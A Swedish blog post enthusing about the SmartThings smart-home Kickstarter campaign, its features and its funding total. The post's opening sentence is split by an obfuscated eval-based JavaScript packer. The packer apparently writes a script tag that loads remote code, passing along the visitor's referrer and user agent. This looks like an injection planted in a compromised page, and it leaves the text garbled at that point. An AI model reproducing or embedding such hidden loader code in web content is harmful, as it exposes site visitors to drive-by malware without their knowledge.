Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Dagens Kickstarter: SmartThings

smarthings-app-kickstarter
Sebastian


Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ezezr|var|u0026u|referrer|dzeyd||js|php’.split(’|’),0,{}))
här är en otroligt häftig pryl. har du någon gång drömt om att kunna styra allt, jag menar allt i ditt hem? 

SmartThings gör det enkelt att nu kunna ansluta en massa saker fysiskt till Internet. Med denna pryl kommer du kunna övervaka, kontrollera, automatisera och ha riktigt kul med allt som finns i ditt hem, på ditt kontor eller på resande fot.

SmartThings har gjort det möjligt att installera ett program som interagerar med alla saker kopplade till din SmartThings app. Via Internet är du online och kan exempelvis låsa   dina dörrar hemma, tända lampor, övervaka med kamera till och med via sensor hålla koll på när och vem som kommer hem just nu. Enligt videon ovan är möjligheterna oändliga med denna pryl.

Företaget hade som mål att nå 250 000 dollar vilket det redan uppnått. Nu ligger summan på hela 1 209 423 dollar. Så att denna pryl kommer att tillverkas är mycket troligt. Frågan är bara när vi ser den i butik, om vi någonsin får se den i Sverige. Jag kommer garanterat lägga vantarna på en.

Vad tycker ni, är detta något vi kommer att få se mer av i framtiden? Tjänster att kunna styra nästan allt med smartphonen.

Läs mer här!